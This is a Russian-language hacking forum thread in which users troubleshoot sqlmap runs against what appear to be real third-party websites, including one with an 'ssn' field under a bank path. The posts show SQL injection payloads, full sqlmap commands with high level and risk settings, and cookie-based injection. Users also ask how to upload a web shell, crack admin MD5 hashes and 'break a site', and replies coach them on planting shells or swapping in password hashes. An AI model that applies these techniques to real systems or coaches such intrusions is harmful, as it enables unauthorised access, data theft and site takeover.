[16:12:56] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. As heuristic test turn
ed out positive you are strongly advised to continue on with the tests. Please,
consider usage of tampering scripts as your target might filter the queries. Als
o, you can try to rerun by providing either a valid value for option '--string'
(or '--regexp')

3. Sqlmap.py -r "txt" --stringer --regexp

После нее возникает снова крит "--tramp space2comment".

и так по кругу... В чем ошибка и как это все сделать правильно, заранее спасибо!

Привет!

Ув. форумчане, помогите пожалуйста!

Можно ли каким-то образом залить шелл?

http://savepic.ru/11440548.png

masterdolicjakov said:
↑ (https://antichat.live/posts/3992477/)
Привет!
Ув. форумчане, помогите пожалуйста!
Можно ли каким-то образом залить шелл?
http://savepic.ru/11440548.png


--is-dba

.Light. said:
↑ (https://antichat.live/posts/3992487/)
--is-dba


Привет!

Нет, к сожалению не под админом.

current user is DBA: False

masterdolicjakov said:
↑ (https://antichat.live/posts/3992495/)
Привет!
Нет, к сожалению не под админом.
current user is DBA: False


ищи админку значит,пробуй через нее залиться

.Light. said:
↑ (https://antichat.live/posts/3992512/)
ищи админку значит,пробуй через нее залиться


Админку нашел.

site.com/admin

Есть логин из базы и пасс в md5

В теме попросил расшифровать пасс.

А так больше нету вариантов?

Да, и спасибо что отвечаете!

Как выбрать нужный playload.?

Parameter: m_id (GET)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: page=subscr_add&m_id=-1933' OR 3776=3776 AND 'dQUO'='dQUO

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: page=subscr_add&m_id=113' AND SLEEP(5) AND 'ZJRH'='ZJRH

Например нужно по 1му playloadу крутить т.к будет в разы быстрее, но по умолчанию выбирает 2й

powerOfthemind said:
↑ (https://antichat.live/posts/3993229/)
Как выбрать нужный playload.?
Parameter: m_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: page=subscr_add&m_id=-1933' OR 3776=3776 AND 'dQUO'='dQUO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=subscr_add&m_id=113' AND SLEEP(5) AND 'ZJRH'='ZJRH
Например нужно по 1му playloadу крутить т.к будет в разы быстрее, но по умолчанию выбирает 2й




Code:
~/sqlmapproject-sqlmap$ python sqlmap.py --help | grep tech
techniques
--technique=TECH SQL injection techniques to use (default "BEUSTQ")

--technique=B

Error based, в current db могу попасть в остальные нет.Есть варианты?

web application technology: ASP.NET, Microsoft IIS 8.5, ASP

back-end DBMS: Microsoft SQL Server 2012

[18:21:54] [INFO] fetching tables for database: Sam

[18:21:54] [WARNING] the SQL query provided does not return any output

[18:21:54] [WARNING] in case of continuous data retrieval problems you are advis

ed to try a switch '--no-cast' or switch '--hex'

[18:21:55] [WARNING] the SQL query provided does not return any output

[18:21:55] [INFO] fetching number of tables for database 'Sam'

[18:21:55] [WARNING] multi-threading is considered unsafe in time-based data ret

rieval. Going to switch it off automatically

[18:21:55] [WARNING] (case) time-based comparison requires larger statistical mo

del, please wait.............................. (done)

[18:22:07] [WARNING] it is very important to not stress the network adapter duri

ng usage of time-based payloads to prevent potential disruptions

do you want sqlmap to try to optimize value(s) for DBMS delay responses (option

'--time-sec')? [Y/n] y

[18:22:10] [INFO] resumed: 0

[18:22:10] [CRITICAL] unable to retrieve the tables for any database

[18:22:10] [WARNING] HTTP error codes detected during run:

500 (Internal Server Error) - 2 times

.SpoilerTarget" type="button">Spoiler: SQLMAP
http://i.prntscr.com/5dae526825274a579c077e59817cab96.png

current user is DBA: True

web server operating system: Linux Ubuntu

web application technology: PHP 5.3.10

back-end DBMS: MySQL >= 5.0.12

database management system users privileges:

%root% (administrator) [28]

Помогите поломать сайтец ) Выполнить SQL не удается, ид юзера слит из таблицы (бд и таблица существуют)

можно ли сделать, чтобы если выходит несколько сообщений CRITICAL или после нескольких обрывов соединение прекратилось сканирование сайта?

Donyan said:
↑ (https://antichat.live/posts/3993877/)
Spoiler: SQLMAP
http://i.prntscr.com/5dae526825274a579c077e59817cab96.png
current user is DBA: True
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
database management system users privileges:
%root% (administrator) [28]
Помогите поломать сайтец ) Выполнить SQL не удается, ид юзера слит из таблицы (бд и таблица существуют)


Ищите пути, заливайте шел, или подставляйте хеш пароля в соответствующие место, прав должно хватать.


zagruzkaaa said:
↑ (https://antichat.live/posts/3993929/)
можно ли сделать, чтобы если выходит несколько сообщений CRITICAL или после нескольких обрывов соединение прекратилось сканирование сайта?


может сервер падает, надо меньше потоков, больше задержки, или быть может система защиты на спец знаки, операторы.

Пытаюсь залить шелл.Права на запись true

[13:46:34] [WARNING] unable to automatically parse any web server path

[13:46:34] [INFO] trying to upload the file stager on '/home/ste/public_htm

l/admin-ste/' via LIMIT 'LINES TERMINATED BY' method

[13:46:37] [WARNING] unable to upload the file stager on '/home/ste/public_

html/admin-ste/'

[13:46:37] [INFO] trying to upload the file stager on '/windows-tools/active-dir

ectory-manager/' via LIMIT 'LINES TERMINATED BY' method

[13:46:39] [WARNING] unable to upload the file stager on '/windows-tools/active-

directory-manager/'

[13:46:39] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 8 times

BabaDook said:
↑ (https://antichat.live/posts/3994038/)
Ищите пути, заливайте шел, или подставляйте хеш пароля в соответствующие место, прав должно хватать.


Мап ясно дает понять,

[WARNING] execution of custom SQL queries is only available when stacked queries are supported.

Можно с этим как-то бороться? Если time-based blind ?

Donyan said:
↑ (https://antichat.live/posts/3994268/)
Мап ясно дает понять,
[WARNING] execution of custom SQL queries is only available when stacked queries are supported.
Можно с этим как-то бороться? Если time-based blind ?


А что не так-то? с чем бороться?

возник следующий вопрос:

бывает что на каком-то тесте зависает очень надолго. как-то можно задать таймаут на тест?

например сегодня зависло на

[INFO] testing 'MySQL inline queries'

BabaDook said:
↑ (https://antichat.live/posts/3994293/)
А что не так-то? с чем бороться?


Ну запросы UPDATE, DELETE, и т.п не кушает...

НУ попробуйте команду в кавычках писать

скл-квери="comm 'parm' "

если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?

C:\sql>python sqlmap.py -u
http://site/
bank --data="base=570%20and%208016%3d8016&country=&bank=&" --dbms=mysql --level 3 --risk 3 --random-agent --no-cast --threads 10 --time-sec=10


И тут -


starting at 21:06:23
[21:06:23] [INFO] fetched random HTTP User-Agent header from file 'C:\sql\txt\user-agents.txt': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50'
[21:06:23] [WARNING] it appears that you have provided tainted parameter values ('base=570 and 8016%3d8016') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[21:06:25] [WARNING] provided value for parameter 'country' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [WARNING] provided value for parameter 'bank' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [WARNING] provided value for parameter 'type' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:06:25] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to '
http://site/bank
'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[21:06:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[21:06:31] [INFO] testing if the target URL is stable
[21:06:32] [WARNING] POST parameter 'ssn' does not appear dynamic
[21:06:33] [WARNING] heuristic (basic) test shows that POST parameter 'ssn' might not be injectable
[21:06:34] [INFO] testing for SQL injection on POST parameter 'ssn'
[21:06:34] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:07:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[21:08:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[21:08:43] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Generic comment)'
[21:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:10:00] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:10:48] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:11:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:12:22] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:13:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[21:13:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[21:13:14] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[21:13:23] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[21:13:27] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:13:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:14:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:14:46] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:15:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:15:33] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:15:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:16:23] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[21:16:48] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[21:17:11] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:17:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[21:17:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[21:17:38] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[21:17:40] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[21:17:42] [INFO] testing 'MySQL inline queries'
[21:17:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[21:17:58] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[21:18:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[21:18:44] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:19:08] [INFO] testing 'MySQL = 5.0.12 AND time-based blind (SELECT)'
[21:19:47] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT)'
[21:20:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT - comment)'
[21:20:27] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SELECT - comment)'
[21:20:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[21:21:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[21:21:34] [INFO] testing 'MySQL = 5.0.12 RLIKE time-based blind (SELECT)'
[21:22:47] [INFO] testing 'MySQL AND time-based blind (ELT)'
[21:23:13] [INFO] testing 'MySQL OR time-based blind (ELT)'
[21:23:38] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[21:24:02] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[21:24:03] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT)'
[21:24:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[21:24:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:28:55] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
[21:34:25] [INFO] testing 'Generic UNION query (NULL) - 11 to 20 columns'
it is not recommended to perform extended UNION tests if there is not at least one other (potential) technique found. Do you want to skip? [Y/n] y
[21:37:35] [INFO] testing 'Generic UNION query (random number) - 11 to 20 columns'
[21:37:35] [INFO] testing 'Generic UNION query (NULL) - 21 to 30 columns'
[21:37:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:37:35] [CRITICAL] connection dropped or unknown HTTP status code received. sqlmap is going to retry the request(s)
[21:37:35] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')


Как быть дальше?

zagruzkaaa said:
↑ (https://antichat.live/posts/3994915/)
если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?


Конечно. Главное что бы инет позволял, однако я призываю вас, всем, проводить самостоятельно эксперименты, и делится результатом с публикой.

Есть уязвимость в с сокет,точнее blind sqlini в сокет параметре

Как сделать запрос к sqlmap что бы он начал крутить?)

GET /url HTTP/1.1

Cookie: checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=100000000000011144483303108802873147495644 1558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIs Im1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2 YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2 YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOV hzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pP WjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeT dqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3 NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZT VhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUta ajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNX VlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=

X-Requested-With: XMLHttpRequest

Referer: https://site.com:443/

Host: https://site.com (https://site.com/)

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21

Accept: */*

androd said:
↑ (https://antichat.live/posts/3995704/)
Есть уязвимость в с сокет,точнее blind sqlini в сокет параметре
Как сделать запрос к sqlmap что бы он начал крутить?)
GET /url HTTP/1.1
Cookie: checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=100000000000011144483303108802873147495644 1558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIs Im1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2 YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2 YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOV hzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pP WjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeT dqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3 NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZT VhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUta ajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNX VlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=
X-Requested-With: XMLHttpRequest
Referer:
https://site.com:443/
Host:
https://site.com (https://site.com/)
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


--cookie="checked=1; guest_id=(Тут СКУЛЯ)=000683%20or%20'bSI5RhDA'='; session=100000000000011144483303108802873147495644 1558208322179665292278; dguid=_454657; XSRF-TOKEN=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeTdqZ1E9PSIs Im1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3NzMyNWY2Y2 YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZTVhMTIiLCJ2 YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUtaajBPTkZLOV hzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNXVlUFEwV0pP WjFNNUo3XC9VaG1raml2MW1MZz09In0=; laravel_session=eyJpdiI6ImdQeG44V1NYTWF0bXNlaW1JeT dqZ1E9PSIsIm1hYyI6IjA4ZjIyZTAwZWQxZTg1MmY4NmUwYTg3 NzMyNWY2Y2YzMjRlYWI2NWYzMDZlYjIwMGM2Nzc3M2QyYWU0ZT VhMTIiLCJ2YWx1ZSI6IjErVTg0MmJpR2tST0k5RERnZVFuMUta ajBPTkZLOVhzOVdydVJvckFSM2VSMWRIaE1nODZ0bVlwY2hwNX VlUFEwV0pPWjFNNUo3XC9VaG1raml2MW1MZz09In0=" -v 3 --level 3 --risk 3 -p guest_id

BabaDook said:
↑ (https://antichat.live/posts/3995365/)
Конечно. Главное что бы инет позволял, однако я призываю вас, всем, проводить самостоятельно эксперименты, и делится результатом с публикой.


ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?

zagruzkaaa said:
↑ (https://antichat.live/posts/3994915/)
если запускать несколько копий sqlmap на одной машине для разных сайтов - это ускорит работу?


wtf а треды тебе на что?


Code:
~$ python sqlmap.py --help | grep threads
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)

если ты действительно имел ввиду то что спрашивал, то нет, количество копий для разных сайтов не ускорит работу о_О

"ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?" узнай лимит канала своего провайдера, хотя даже 1-2мб ты запаришся забивать sqlmap'ом, скорее тебе пров атата скажет

t0ma5 said:
↑ (https://antichat.live/posts/3996345/)
wtf а треды тебе на что?

Code:
~$ python sqlmap.py --help | grep threads
--threads=THREADS Max number of concurrent HTTP(s) requests (default 1)

если ты действительно имел ввиду то что спрашивал, то нет, количество копий для разных сайтов не ускорит работу о_О
"ну допустим я запустил копий 20, как понять - что добавление еще копий не ускорит работу, т.е интернет уже на пределе?" узнай лимит канала своего провайдера, хотя даже 1-2мб ты запаришся забивать sqlmap'ом, скорее тебе пров атата скажет


не типа, смотри, запускаем одно временно сканить 2 сканеров и 20 разных сайтов, типа это будет по скорости быстрее, чем сканить с начало 1 сайт, потом второй итд...

BabaDook said:
↑ (https://antichat.live/posts/3996347/)
не типа, смотри, запускаем одно временно сканить 2 сканеров и 20 разных сайтов, типа это будет по скорости быстрее, чем сканить с начало 1 сайт, потом второй итд...


сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды

t0ma5 said:
↑ (https://antichat.live/posts/3996494/)
сканеры независимо друг от друга будут работать, как "сканер 1" поймет что сайт "site.com" уже просканирован "сканером 2"? для это же придумали потоки и треды


долго объяснять свою мысль, уже флуд будет